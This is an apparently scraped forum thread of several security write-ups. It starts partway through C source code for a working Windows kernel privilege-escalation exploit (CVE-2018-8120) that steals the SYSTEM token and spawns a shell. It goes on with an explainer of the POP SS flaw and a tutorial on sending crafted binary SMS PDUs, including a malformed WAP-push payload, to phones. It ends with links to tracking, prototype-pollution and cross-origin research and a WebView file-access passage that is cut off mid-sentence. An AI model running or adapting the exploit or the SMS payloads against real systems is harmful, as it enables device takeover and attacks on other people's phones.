pLiveFunctionAddress; } LONG WINAPI VectoredHandler1( struct _EXCEPTION_POINTERS *ExceptionInfo ) { HMODULE v2; if (ExceptionInfo->ExceptionRecord->ExceptionCode == 0xE06D7363) return 1; v2 = GetModuleHandleA("kernel32.dll"); ExceptionInfo->ContextRecord->Eip = (DWORD)GetProcAddress(v2, "ExitThread"); return EXCEPTION_CONTINUE_EXECUTION; } DWORD FindAddressByHandle( HANDLE hCurProcess ) { PSYSTEM_HANDLE_INFORMATION pSysHandleInformation = new SYSTEM_HANDLE_INFORMATION; DWORD size = 0xfff00; DWORD needed = 0; DWORD dwPid = 0; NTSTATUS status; pSysHandleInformation = (PSYSTEM_HANDLE_INFORMATION)malloc(size); memset(pSysHandleInformation, 0, size); status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInformation, size, &needed); // pSysHandleInformation = (PSYSTEM_HANDLE_INFORMATION)new BYTE[needed]; // status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInformation, needed, 0); // if (!status) // { // if (0 == needed) // { // return -1;// some other error // } // // The previously supplied buffer wasn't enough. // delete pSysHandleInformation; // size = needed + 1024; // // if (!status) // { // // some other error so quit. // delete pSysHandleInformation; // return -1; // } // } dwPid = GetCurrentProcessId(); for (DWORD i = 0; i < pSysHandleInformation->dwCount; i++) { SYSTEM_HANDLE& sh = pSysHandleInformation->Handles[i]; if (sh.dwProcessId == dwPid && (DWORD)hCurProcess == (DWORD)sh.wValue) { return (DWORD)(sh.pAddress); } } return -1; } HANDLE hDesHandle = NULL; DWORD dwCurAddress; PACCESS_TOKEN pToken; DWORD *v1; DWORD v2, *p2; DWORD i; PVOID Memory = NULL; DWORD ori_ret = 0; void __declspec(naked) EscapeOfPrivilege(HANDLE hCurProcess) { __asm { push ebp mov ebp,esp } //v1 = (DWORD *)&hCurProcess; if (DuplicateHandle(hCurProcess, hCurProcess, hCurProcess, &hDesHandle, 0x10000000u, 0, 2u)) { dwCurAddress = FindAddressByHandle(hDesHandle); if ( dwCurAddress == -1 ) { printf("Find Current Process address Failed!\n"); system("pause"); //exit(-1); } printf("addrProcess:0x%08x\n", dwCurAddress); v1 = (DWORD *)dwCurAddress; __asm{ push ecx; save context lea ecx, Farcall call fword ptr[ecx] mov eax, [esp] mov [ebp-0x2c], eax add esp,4 } p2 = &v2; p2 = *(DWORD**)fpPsInitialSystemProcess; pToken = ((PsReferencePrimaryToken_t)fpPsReferencePrimaryToken)(p2); // //// walk through token offset // if ((*p2 & 0xFFFFFFF8) != (unsigned long)pToken) // { // do // { // i = p2[1]; // ++p2; // ++v1; // } while ((i & 0xFFFFFFF8) != (unsigned long)pToken); // } Memory = (PVOID)(ULONG)((char*)dwCurAddress + 0xf8); *(PULONG)Memory = *(PULONG)((char*)p2 + 0xf8); __asm { mov eax, [ebp-0x2c] push eax mov eax, PopShell push eax retf } } } int fill_callgate(int a1, int a2, int a3) { int *v3; // edx int v4; // ecx signed int v5; // esi v3 = (int *)(a1 + 4); v4 = a2 + 352; v5 = 87; do { *v3 = v4; v4 += 8; v3 += 2; --v5; } while (v5); if (!a3) { *(DWORD *)(a1 + 96) = 0xC3; // ret *(WORD *)(a1 + 76) = a2 + 0x1B4; // address low offset *(WORD *)(a1 + 82) = (unsigned int)(a2 + 0x1B4) >> 16; // address high offset *(WORD *)(a1 + 78) = 0x1A8; // segment selector *(WORD *)(a1 + 80) = 0xEC00u; *(WORD *)(a1 + 84) = 0xFFFFu; *(WORD *)(a1 + 86) = 0; *(BYTE *)(a1 + 88) = 0; *(BYTE *)(a1 + 91) = 0; *(BYTE *)(a1 + 89) = 0x9Au; *(BYTE *)(a1 + 90) = 0xCFu; } return 1; } void main() { NTSTATUS ntStatus; PVOID pMappedAddress = NULL; SIZE_T SectionSize = 0x4000; DWORD_PTR dwArg1; DWORD dwArg2; PVOID pMappedAddress1 = NULL; RtlAdjustPrivilege_t RtlAdjustPrivilege; DWORD dwPageSize = 0; char szGDT[6]; struct _SYSTEM_INFO SystemInfo; HANDLE hCurThread = NULL, hCurProcess = NULL; HMODULE hNtdll = NULL; PVOID dwAllocMem = (PVOID)0x100; PVOID pAllocMem; HWINSTA hWndstation; DWORD temp; fpPsInitialSystemProcess = KernelSymbolInfo(lpPsInitialSystemProcess); fpPsReferencePrimaryToken = KernelSymbolInfo(lpPsReferencePrimaryToken); if ( fpPsInitialSystemProcess && fpPsReferencePrimaryToken ) { AddVectoredExceptionHandler(1u, VectoredHandler1); hCurThread = GetCurrentThread(); dwArg1 = SetThreadAffinityMask(hCurThread, 1u); printf("thread prev mask : 0x % 08x\n", dwArg1); __asm { sgdt szGDT; } temp = *(int*)(szGDT + 2); printf("addrGdt:%#p\n", *(int*)(szGDT + 2)); GetSystemInfo(&SystemInfo); dwPageSize = SystemInfo.dwPageSize; hNtdll = GetModuleHandle("ntdll.dll"); NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory"); if (!NtAllocateVirtualMemory) { printf("\t\t[-] Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError()); system("pause"); //exit(-1); } RtlAdjustPrivilege = (RtlAdjustPrivilege_t)GetProcAddress(hNtdll, "RtlAdjustPrivilege"); if (!NtAllocateVirtualMemory) { printf("\t\t[-] Failed Resolving RtlAdjustPrivilege: 0x%X\n", GetLastError()); system("pause"); //exit(-1); } hCurProcess = GetCurrentProcess(); ntStatus = NtAllocateVirtualMemory(hCurProcess, &dwAllocMem, 0, (PULONG)&dwPageSize, 0x3000, 4); if (ntStatus) { printf("Alloc mem Failed! Error Code: 0x%08x!\n", ntStatus); system("pause"); //exit(-1); } pAllocMem = operator new(0x400); memset(pAllocMem, 0, 0x400u); *(DWORD *)(*(DWORD*)dwAllocMem + 0x14)= *(DWORD*)pAllocMem; *(DWORD *)(*(DWORD*)dwAllocMem + 0x2C) = temp+0x154; fill_callgate((int)pAllocMem, temp, 0); //*(DWORD *)(v22 + 20) = *(DWORD*)pAllocMem; //*(DWORD *)(v22 + 44) = v22[1] + 340; printf("ready to trigger!\n"); hWndstation = CreateWindowStationW(0, 0, 0x80000000, 0); if ( hWndstation ) { if (SetProcessWindowStation(hWndstation)) { __asm { //int 3 push esi mov esi, pAllocMem push eax push edx push esi push esi mov eax,0x1226 mov edx, 7FFE0300h call dword ptr[edx] pop esi pop esi pop edx pop eax pop esi } Farcall.SegSelector = 0x1a0; EscapeOfPrivilege( hCurProcess ); PopShell(); } else { int n = GetLastError(); printf("step2 failed:0x%08x\n", n); system("pause"); //exit(-1); } } else { int n = GetLastError(); printf("step1 failed:0x%08x\n", n); system("pause"); //exit(-1); } } else { printf("Init Symbols Failed! \n"); system("pause"); //exit(-1); } } Sursa: https://github.com/bigric3/cve-2018-8120
-
Dissecting the POP SS Vulnerability Author: Joe Darbyshire No Comments Share: The newly uncovered POP SS vulnerability takes advantage of a widespread misconception about behaviour of pop ss or mov ss instructions resulting in exceptions when the instruction immediately following is an interrupt. It is a privilege escalation, and as a result it assumes that the attacker has some level of control over a userland process (ring 3). The attack has the potential to upgrade their privilege level to ring 0 giving them complete control of the target system. By jailing the guest OS using a hypervisor which operates at a hardware-enforced layer below ring 0 on the machine, PCs protected by Bromium are immune to threats of this nature. Today we are dissecting the pop ss or mov ss vulnerability. To understand the attack, you must first be familiar with CPU interrupts and exceptions. CPU interrupts and exceptions Interrupts and exceptions are used by the CPU to interrupt the currently executing program in order to handle unscheduled events such as the user pressing a key or moving the mouse. Exceptions also interrupt the currently running process, but in response to an event (usually an error) resulting from the currently executing instruction. The need for these two CPU features stems from the fact that these events are not predetermined and must be dealt with as and when they occur, rather than according to a predefined schedule. When an interrupt or exception is triggered, it is down to the OS to decide how to handle it. There are operating system routines for each type of interrupt which can be triggered by the CPU to determine, from the current state information, how the instruction should be dealt with. The pop ss vulnerability takes advantage of a bug in OS routines for dealing with interrupts caused by unexpected #db (debug) exceptions triggered in the kernel. The root of the vulnerability Under normal circumstances, CPU exceptions are triggered immediately upon retirement of the instruction that caused them. However, with pop ss and mov ss instructions this is deemed unsafe since they are used as part of sequence such as the following to switch stacks: mov ss, [rax] mov rsp, rbp If mov ss, [rax] causes an exception, it would be handled with an invalid stack pointer since the stack segment offset has been changed but the new stack pointer has not yet been set. Consequently, the design decision was made to trigger the exception on retirement of the instruction immediately following the offending instruction to allow the stack pointer to be set correctly. Whilst this solved the issue of exception handling with an invalid stack pointer, it had the unforeseen side effect of creating an unexpected state for the OS if the next instruction was itself an interrupt such as in the following case: mov ss, [rax] int 0x1 In this scenario, due to the context switch caused by int 0x1 which is executed before the exception handler, the handler will be triggered from ring 0 despite being caused by ring 3 code. Since OS developers have been operating under the assumption that ring 0 code exclusively will be responsible for exceptions triggered within the kernel, this causes them to potentially mishandle this edge case whereby an exception is triggered from within the kernel by a userland process. The paper published describes one way in which the attacker can use this scenario to manipulate kernel memory in unintended ways by tricking the kernel into operating on userland data structures when handling the exception. In the kernel, the gs segment register is used as a pointer to various kernel related data structures. Following a system call, the kernel calls swapgs to set the gs register to the kernel specific value, and, upon exit from the kernel, swapgs is called again to return it to its original userland value. However, in our case, an exception was triggered before swapgs could be executed by the kernel so it is still using a user defined gs value upon triggering the exception from ring 0. In handling the interrupt, vulnerable OSs determine whether swapgs needs to be called based on the location which the interrupt was fired from. If the exception was triggered from the kernel, the OS makes the (incorrect) assumption that, swapgs has already been called when context was first switched to the kernel, so it attempts to handle it without executing this instruction first. As a result the exception is handled using a user defined gs register value creating the opportunity to corrupt kernel memory in a manner which allows for arbitrary code execution. Bromium immunity Bromium VMs are immune to escape using this kind of attack since user memory along with kernel memory is jailed within the hypervisor and specific to each instance. As a result, nothing is gained even when an attacker gains complete control of the kernel within a VM – there is no sensitive information to steal and no way for an attacker to propagate or persist. There are certain kinds of hypervisors that are potentially vulnerable to this attack including Xen legacy PV VMs. This is because the architecture runs the hypervisor at ring 0, whilst the kernel and userspace both operate as ring 3 processes communicating with one another via the hypervisor. As a result, if the hypervisor mishandles an exception, this allows for the attacker to obtain ring 0 on the physical machine effectively escaping the VM. The Bromium hypervisor is protected from this threat since it operates at a hardware-enforced layer which sits behind ring 0 for all the VMs on a system. Learn more about the Bromium Secure Platform. Sursa: https://blogs.bromium.com/dissecting-pop-ss-vulnerability/
-
Binary SMS - The old backdoor to your new thing Despite being older than many of its users, Short Messaging Service (SMS) remains a very popular communications medium and is increasingly found on remote sensors, critical infrastructure and vehicles due to an abundance of cellular coverage. To phone users, SMS means a basic 160 character text message. To carriers and developers it offers a much more powerful range of options, with sizes up to a theoretical maximum of 35KB and a myriad of binary payloads detailed within the GSM 03.40 specification. Carriers make use of these advanced features for remote management. They can send remote command SMS messages to trigger and interact with hidden applications on their devices without the user's consent. Law Enforcement can track a phone with 'silent' SMS messages designed not to alert the user. SMS technology underpins a lot of Mobile Device Management (MDM) frameworks. The coupling between a smart-phone’s software and it's radio is a lot closer than you might think. SMS messages containing malicious payloads can be targeted at listening applications on a device and from there processed by the target software. If the software is poorly written, remote memory corruption and arbitrary code execution are possible.The vehicle for getting a payload to a target application on a phone (or smart device) is the Protocol Data Unit (PDU) which contains framed user data which is forwarded, without inspection, to a logical port on the operating system – with the privileges of the radio (System normally). This is comparable to a computer running open services on the internet without a firewall. Legalities and options The GSM spectrum is very expensive private property. You may not transmit (or even receive) in GSM bands without permission. In the UK, it is an offence under the Wireless Telegraphy Act to transmit on licensed bands without permission and furthermore intercepting GSM without a warrant is an offence under the Regulation of Investigatory Powers Act.You should apply for a licence (example from OFCOM below) before commencing GSM testing and will also need a faraday cage to suppress radiation. (For these reasons, GSM interfaces get less scrutiny than TCP/IP for example). If you feel compelled to write another OpenBTS blog, we recommend not publishing screenshots that suggest you broke the law as this would be very irresponsible and could compromise your company's reputation. For users on a budget, you can send SMS PDUs as a regular subscriber over an existing public carrier using a GSM modem but you must check your carrier's terms and conditions first.Using Vodafone's Terms and Conditions for example, customers are not allowed to use the service to break the law or use automated means to send texts. Scripting your testing to attack someone else's phone would definitely not be allowed but manually sending an SMS PDU (or two) to test a phone you own could be OK. It is up to you to satisfy yourself that you are compliant with your carrier's terms and conditions. SMS PDU mode There are two defined modes for SMS: Text and raw PDU mode. In PDU mode, the entire frame can be defined which opens up a huge attack surface in the form of the (user defined) encapsulating fields as well as the prospect for a malicious payload to be received by a target application on the phone. The beauty of PDU mode is a poorly written software application on a handset can be exploited remotely.This is made possible through the Protocol Data Unit (PDU) which allows large messages to be fragmented as Concatenated SMS (C-SMS) and crucially from a security aspect, messages to be addressed to different applications on a mobile using port numbers akin to TCP/IP. WAP push is a popular example of a binary PDU. A typical WAP push message from your carrier may contain GPRS or MMS configuration settings which after reassembly appears as a special message which requests user permission to define new network configuration values defined within an XML blob. WAP might well be a legacy protocol, but it's a powerful legacy protocol which can be used for many malicious purposes. Displaying a text message is optional. Some SMS messages can be sent to your handset without your knowledge and will never appear in your inbox (a silent SMS). Message display can also be forced by setting the 'Class 0' type (flash SMS) which will cause the SMS to display in the foreground without user interaction. This public alerting system is used in the US by the emergency services and is typically delivered as a cell broadcast whereby all subscribers attached to a tower receive the SMS simultaneously. SMS test environment options When testing SMS PDUs you can do it in your own private test environment with a GSM test licence or over a public carrier. A private environment has several key advantages: Cost – Sending lots of SMS messages can be expensive, especially once you start concatenating messages. Control – SMS messages on a busy carrier are subject to unpredictable delays and contractual restrictions Debugging – a private environment will allow you to monitor messages and responses on the air interface which is essential for early testing. A public carrier is (potentially) much cheaper and quicker to use, with just a 3G dongle, but forfeits control and is subject to the terms and conditions of your carrier which may not allow testing with their network. Private SMS test environment To inspect SMS PDUs on the air interface a GSM base station is required. One of the best known open source base stations is OpenBTS, for which there are many setup tutorials for many different platforms. In our experience of OpenBTS it is indeed quick to setup but it's PDU handling needs work. It has a Command Line Interface (CLI) for sending both types of SMS but we found the PDU validation routine to be buggy for Mobile Terminated (MT) SMS messages which is exactly what we're interested in. After spending a long time nailing down the validation issue (and judging by the developer's comments and try/catch blocks we weren't alone) we happened across YateBTS which we found to have better support for testing MT-SMS. YateBTS can be installed on a Raspberry Pi 3 which gives the advantage of having it in a small portable form so you can place it inside the faraday cage for example so it can be accessed by many users on a LAN. You should keep the distance between the radio and the host computer as short as possible and do not daisy chain USB cables as the clock requirements are so precise you will experience stability issues. Kit list All prices are approximate. A cellar or room with double concrete walls could be used instead of a faraday cage providing your licensing authority are satisfied it will suppress emissions sufficiently (>60dB). Twelve inch concrete blocks have 35dB of attenuation at 900MHz. Ettus USRP B200 with 2 900MHz antennas: £600 Ettus GPS disciplined oscillator (TCXO) with GPS antenna: £500 Ramsey STE3000 RF enclosure: £1500 Raspberry Pi 3: £35 YateBTS: Free Wireshark: Free Osmo-trx driver: Free Ettus UHD library: Free Total: £2635 Building Open source BTS tutorials age off quicker than a Gentoo kernel due to the fast moving world of open source GSM and the dynamic dependencies required. We recommend focusing on learning the standard and concepts rather than particular packages but if you want a recent tutorial, you'll find a comprehensive tutorial for an open source BTS (Yate) on a Pi here. OpenBTS and YateBTS don't prescribe hardware or drivers so you can use it with multiple radios, providing they support the precise timing requirements of a GSM base station which are for an error rate of 0.05 ppm. This is more relaxed for pico cells at 0.1ppm. If you attempt to stand up a BTS without a precision clock source you will find it is unstable. You may get lucky and get your handset to see the network and attach to it briefly at close range but it won't last and will quickly fall over once you commence testing. A precision clock is essential. The GPS unit we used requires an external GPS receive antenna and does take a while to acquire a fix (Green LED) initially. A key configuration change for using a low power PC like a Pi is the third party radio driver which must be defined within ../etc/yate/ybts.conf. We had success with the official Ettus UHD driver but opted for the ARM friendly osmo-trx transceiver compiled with UHD 003.010 defined as Path=./osmo-trx and homed at ../lib/yate/server/bts/osmo-trx Testing Understanding the many unique aspects of the GSM air interface is not necessary to perform SMS testing but having a basic understanding of paging will help. Getting your handset to attach initially is half the battle, after that the rest is quite straightforward and very much in the realm of computing not RF. The gsmtap PCAP output is an invaluable tool in testing your setup and monitoring traffic on the air interface. To use it, enter Yate's web UI and update the monitoring IP to your own, check the gsmtap box, then spin up wireshark on your external interface. This feature can be used remotely which is convenient for users on a LAN. The gsmtap UDP packets for both the uplink and downlink will be sent blindly to port 4729 on your host and will likely elicit ICMP port closed responses. A healthy BTS will be broadcasting data frames constantly on its Broadcast Channel (BCCH) and subscribers will be able to attach to it providing their International Mobile Subscriber Identifier (IMSI) is allowed under the access rules. When initiating an SMS, the first thing the BTS does is page the handset on the Common Control Channel (CCCH) to test for it's presence. The handset should respond in kind after which the BTS will send the SMS PDU(s) on the Standalone Dedicated Control Channel (SDCCH). In the screenshot below, a concatenated 3 part SMS has been sent over our YateBTS by subscriber 12345. Only when the final fragment arrives is it reassembled into a complete SMS. Each fragment is acknowledged separately which is helpful for debugging concatenation issues. Wireshark filters Only GSM: gsmtap && !icmp Only paging activity: gsmtap.chan_type == CCCH && !icmp Only SMS (Uplink / Downlink): gsm_a.dtap.msg_sms_type == 0x01 Only SMS from originator 12345: gsm_sms.tp-oa == "12345" Only SMS ack from subscriber: gsm_a.rp.msg_type == 0x02 To send a PDU with YateBTS you can either use the dedicated script in the web interface at /nib_web/custom_sms.php or the more flexible telnet interface on TCP port 5038.Both methods require the IMSI of the recipient which you can find from the registered subscribers list or by monitoring handset registration and paging on the air interface.We wrapped the telnet interface with our own PHP script using the socket API like so: // PHP $cmd="control custom_sms called=$imsi $type=rpdu";$socket = fsockopen("localhost", "5038", $errno, $errstr); fputs($socket, "$cmd "); With our SMS web API we were not only able to let other researchers on the LAN send PDUs but also de-skill the knowledge required to perform SMS testing. The PDU sent on the air interface looks different than the PDU sent over the public network because of differences in SMS-DELIVER (BTS > MS) and SMS-SUBMIT (MS > BTS) formats. To learn more about PDUs see the PDU section. Public SMS test environment PDU testing doesn't have to be expensive. You can send custom PDUs using any GSM device on which you can issue AT modem commands. A practical solution is a 3G dongle such as the Huawei E3533 or even a basic development board such as the Adafruit FONA series. Using the £20 Huawei E3533 as an example, you will need to ensure the device is connected in GSM modem mode, not Ethernet adapter or mass storage etc. To do this with Linux issue a usb_modeswitch command as follows: usb_modeswitch -v 0x12d1 -p 0x1f01 -V 0x12d1 -P 0x14db -M "55534243123456780000000000000011063000000100010000000000000000" More device specific commands are available in the forum at http://www.draisberghof.de/usb_modeswitch/bb/ Once you have a /dev/ttyUSBx, connect to it with a serial console like minicom and issue the following Hayes AT commands:AT+CMGF=0 to place the modem into PDU mode. AT+CMGS=n to prepare to send a PDU of length n bytes, followed by the PDU itself in hexadecimal form. To obtain the length take the total number of hexadecimal characters, divide it by 2 to get bytes then subtract 8 bytes for the recipient's number. Tip: Hit Ctrl-Z to send the PDU. Do not hit enter. The serial commands are easily scripted using Python's serial library. Before firing up your Python interpreter, bear in mind your carrier's terms and conditions regarding automated sending of SMS messages. So long as you are in control of each message's transmission you should be ok. Here's a basic Python client for sending a PDU via a GSM modem. # Python ser = serial.Serial(tty, 115200, timeout=5)ser.write('AT ')if "OK" in ser.read(64): print "CONNECTED TO MODEM OK" ser.write("AT+CMGF=0 ") # PDU mode ser.write("AT+CMGS=%d " % ((len(pdu)/2)-8)) time.sleep(1) ser.write('%s' % pdu) print ser.read(64) else: print "MODEM FAILURE"ser.close() Protocol Data Units (PDUs) The GSM 03.40 standard describes Transfer Protocol Data Units (TPDUs) which are used to convey an SMS. The TPDU is used throughout the messages journey across the telecoms network. There are different types of SMS PDUs. PDUs from the handset to the network are SMS-SUBMIT and could start with byte 0x01, PDUs from the network down to the handset are SMS-DELIVER and could start with byte 0x00 and are normally longer due to the addition of a 7 octet date service centre time stamp. The first byte is a bitmask of multiple flags and contains a lot of information. PDU encoding is complicated but thankfully there are many free online encoders and programming libraries like Python's smspdu to validate your PDU against the GSM 03.40 standard. Before jumping straight in and using one it's important you understand some key fields and the significant difference between DELIVER and SUBMIT PDUs as many online decoders only do SUBMIT and not DELIVER. We've tested lots and recommend Python's smspdu library. Example validation of a PDU: python -m smspdu [PDU] The Protocol Identifier (PID) field refers to the application layer protocol used. The default value 0x00 is used for plain short messages. Setting the PID to 0x64 would be a silent SMS known as a 'type 0' SMS which all handsets receive and must acknowledge without indicating its receipt to the user. As previously mentioned, this has been used by law enforcement to actively 'ping' a handset on a network. User data headers and concatenation When you want to target an application on a phone you need to define the destination port within the User Data Header (UDH) which sits between the PDU header and User Data (UD) and is declared early on with the User Data Header Indicator (UDHI) flag in the first octet. The UDH is also where Concatenated SMS (C-SMS) fragments are described. SMS allows for large (binary) payloads to be chunked up and sent as separate messages, not necessarily in sequence. This allows for up to 35,700 bytes of custom data to be sent to an application on a handset as 255 texts (Warning: You get billed per SMS). To chunk up a large message, it must first be split up into user data fragments not more than 140 octets each. A concatenated fragment is indicated via the UDHI flag in the first byte which indicates the first few bytes of the UD are fragment information which is used to reassemble the fragments later in order. Each fragment would be sent, preceded by the SMSC header, destination number, and the Protocol Identifier (PID) and Data Coding scheme (DCS) bytes. The fragment header contains the fragment count, a unique byte which serves as a batch identifier for all the fragments as well as the total number of fragments. Example UDH declaring 16 bit port addressing AND concatenation: 0A050B8457320003FF0201 0A: UDH length minus length field: 10 05: 16 bit application port addressing (Next four octets) 0B84: Destination port: 2948 (WAP push) 5732: Source port: 1664 00: Concatenated SMS 03: Information Element length for C-SMS section: 3 FF: Unique message identifier: 255 02: Fragments total: 2 01: This fragment: 1 For more UDH options see the 3GPP 23.040 standard. Hello World! SMS-SUBMIT PDU This PDU to MSISDN +441234567890 has the 'immediate display' flag set so will pop up as a flash SMS on the recipient's handset: 01000C9144214365870900000CC8329BFD065DDF72363904 Bear in mind that data encoding varies between sections. Some sections are special bit-masks, some are GSM 7 bit encoded and some are just plain old hexadecimal. 01: SMS-SUBMIT with default flags (Bitmask) 00: Message type 0 (bits 0-1)Reject duplicates flag set (bit 2) (Bitmask) 0C: Recipient length 12 digits (0x0C) 91: International ISDN/Telephone numbering plan (Bitmask) 442143658709: Recipient MSISDN (+441234567890) (GSM 7 bit encoding) 0000: Protocol identifier 0: Plain old SMS, Data Coding Scheme 0: Flash message (Bit mask) CC8329BFD065DDF72363904: User data: Hello World! (GSM 7 bit encoding) GSM interfaces on phones don't have firewalls With an Android phone you would see the following activity in the log when an SMS PDU is received. This shows the Radio Interface Layer (RIL) notifying the kernel of an incoming unsolicited PDU of length 168 (21 bytes). The full PDU is written to a SQLITE database, an automatic acknowledgement is sent (SMS-DELIVER-ACK) back to the network and finally the PDU is delivered to Android's privileged SMS receiver for onward processing, in this case to the message store although it could be routed to a listening application if a destination port is specified in the UDH. The only check is within the SmsHandler() which checks if SMS messages are allowed. There is no concept of packet inspection or port filters like an IP firewall. adb logcat -b radio I/RILC ( 2139): RIL_SOCKET_1 UNSOLICITED: UNSOL_RESPONSE_NEW_SMS length:168D/RILJ ( 2988): [UNSL]< UNSOL_RESPONSE_NEW_SMS [SUB0]D/GsmInboundSmsHandler( 2988): IdleState.processMessage:1D/GsmInboundSmsHandler( 2988): Idle state processing message type 1D/GsmInboundSmsHandler( 2988): acquired wakelock, leaving Idle stateD/GsmInboundSmsHandler( 2988): entering Delivering stateD/GsmInboundSmsHandler( 2988): DeliveringState.processMessage:1D/GsmInboundSmsHandler( 2988): isSMSBlocked=falseD/GsmInboundSmsHandler( 2988): URI of new row -> content://raw/1D/RILJ ( 2988): [9382]> SMS_ACKNOWLEDGE true 0 [SUB0]D/GsmInboundSmsHandler( 2988): DeliveringState.processMessage:2D/RILC ( 2139): SOCKET RIL_SOCKET_1 REQUEST: SMS_ACKNOWLEDGE length:20D/GsmInboundSmsHandler( 2988): Delivering SMS to: com.android.mms com.android.mms.transaction.PrivilegedSmsReceiver Targeting port 2948 with random data In this example, an SMS-SUBMIT containing 1000 characters of malformed WBXML has been concatenated as 7 fragments and targeted at a the WAP push application listening on port 2948.Because of the port number, an assumption about the data type of the payload is made (WBXML). This could be any binary data addressed to any port. PDU bytes: 41000C9144214365870900009B0B05040B8457320003FF0201C2E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E17018 41: SMS-SUBMIT with a user data header (Bitmask), Reject duplicates flag set (bit 2), User Data Header flag set (bit 3) 00: Message type 0 (bits 0-1) Immediate display 0C: Recipient length 12 digits (0x0C) 91: International ISDN/Telephone numbering plan (Bitmask) 442143658709: Recipient MSISDN (+441234567890 encoded as 7-bit ASCII) 0000: PID: 0, DCS: 0 9B: User data length (including UDH): 155 0B05040B8457320003FF0201:User Data Header (UDH). Length: 0x0B 16 bit port addressing: 0x05 Four octets long: 0x04 Destination port: 0x0B84 Source port: 0x5732 Concatenated SMS: 0x00 Three octets long: 0x03 Sequence identifier: 0xFF Total fragments: 0x02 This fragment: 0x01 C2E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E17018:User Data. Malformed WBXML composed of repeat sequence of letter 'a'. Conclusion SMS is a weak link in a handset's security. With it you can interact, remotely, with an application on someone's phone when the phone is not connected to the internet. Significantly it has no firewall so bad packets are always forwarded. Despite being an old specification it has received much less scrutiny than Internet Protocol for example and many applications (and non-conventional devices now) handle SMS PDUs with a greater level of trust than they afford IP packets for comparison. In our next SMS blog we'll employ these concepts to attack the application layer on a phone remotely... Contact and Follow-up Alex is a senior researcher based in Context's Cheltenham office. He has over 15 years' experience of engineering and analysing RF systems and protocols and specialises in electronic warfare and RF propagation. See the contact page for how to get in touch. Sursa: https://www.contextis.com/blog/binary-sms-the-old-backdoor-to-your-new-thing
-
- 2
-
-
HOW TO DETERMINE THE LOCATION OF A MOBILE SUBSCRIBER Sergey Puzankov In mobile networks, rather specific attacks are possible. In this article, I will consider a real-time attack that allows one to detect a cell where a subscriber is located. I cannot specify the method accuracy in more common units of measurement, because cell coverage areas greatly vary based on the terrain. In a densely built-over urban area, a cell could cover several hundred meters. However, on an intercity highway in the wild, a cell might only cover several kilometers. Download: https://www.ptsecurity.com/upload/iblock/8c0/8c065c70984c93d3001234ed6e6d865b.pdf
-
- 1
-
-
Prototype pollution attack Abstract Prototype pollution is a term that was coined many years ago in the JavaScript community to designate libraries that added extension methods to the prototype of base objects like "Object", "String" or "Function". This was very rapidly considered a bad practice as it introduced unexpected behavior in applications. In this presentation, we will analyze the problem of prototype pollution from a different angle. What if an attacker could pollute the prototype of the base object with his own value? What APIs allow such pollution? What can be done with it? Paper Link to paper Slides Link to slides Sursa: https://github.com/HoLyVieR/prototype-pollution-nsec18
-
How do we Stop Spilling the Beans Across Origins? A primer on web attacks via cross-origin information leaks and speculative execution aaj@gxxgle.com, mkwst@gxxgle.com Intro Browsers do their best to enforce a hard security boundary on an origin-by-origin basis. To vastly oversimplify, applications hosted at distinct origins must not be able to read each other's data or take action on each other’s behalf in the absence of explicit cooperation. Generally speaking, browsers have done a reasonably good job at this; bugs crop up from time to time, but they're well-understood to be bugs by browser vendors and developers, and they're addressed promptly. The web platform, however, is designed to encourage both cross-origin communication and inclusion. These design decisions weaken the borders that browsers place around origins, creating opportunities for side-channel attacks (pixel perfect, resource timing, etc.) and server-side confusion about the provenance of requests (CSRF, cross-site search). Spectre and related attacks based on speculative execution make the problem worse by allowing attackers to read more memory than they're supposed to, which may contain sensitive cross-origin responses fetched by documents in the same process. Spectre is a powerful attack technique, but it should be seen as a (large) iterative improvement over the platform's existing side-channels. This document reviews the known classes of cross-origin information leakage, and uses this categorization to evaluate some of the mitigations that have recently been proposed ( CORB , From-Origin , Sec-Metadata / Sec-Site , SameSite cookies and Cross-Origin-Isolate ). We attempt to survey their applicability to each class of attack, and to evaluate developers' ability to deploy them properly in real-world applications. Ideally, we'll be able to settle on mitigation techniques which are both widely deployable, and broadly scoped. Sursa: https://www.arturjanc.com/cross-origin-infoleaks.pdf
-
Main Articles Advisories Tools About May 15, 2018 Reviewing Android Webviews fileAccess attack vectors. Introduction WebViews are a crucial part of many mobile applications and there are some security aspects that need to be taken into account when using them. File access is one of those aspects. For the implementation of some checks in our security tool Droidstatx, I’ve spent some time understanding all the details and noticed that not all attack vectors are very clear, specially in their requirements. WebView file access is enabled by default. Since API 3 (Cupcake 1.5) the method setAllowFileAccess() is available for explicitly enabling or disabling it. A WebView with file access enabled will be able to access all the same files as the embedding application, such as the application sandbox (located in /data/data/<package_name>), /etc, /sdcard, among others. Above API 19(KitKat 4.4 - 4.4.4), the app will need the android.permission.READ_EXTERNAL_STORAGE permission. The WebView needs to use a File URL Scheme, e.g., file://path/file, to access the file. Another important detail is that WebViews have Javascript disabled by default. The method setJavaScriptEnabled() is available for explicitly enabling or disabling it.. Before going into details regarding the type of attack vectors that are made possible with file access, one needs to be aware of another concept, Same Origin Policy (SOP): A web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. An origin is defined as a combination of URI scheme, host name, and port number. in https://en.wikipedia.org/wiki/Same-origin_policy As an example, the URLs https://www.integrity.pt and file://etc/hosts do not have the same origin since they won’t match in: Scheme: HTTPS vs file Authority: www.integrity.pt vs etc/hosts This means that a file request in the context of the https://www.integrity.pt loaded contents will be considered a Cross Origin Request (COR). Attack Vectors So we have a WebView with file access. Now what? As an attacker we want data exfiltration and this is what motivated me to write this article because there are details that can invalidate this type of attack. Scenario 1: App with WebView that loads resources which the attacker is able to intercept and manipulate. Javascript enabled. In this scenario, an attacker is able to intercept the communication of the app and is able to 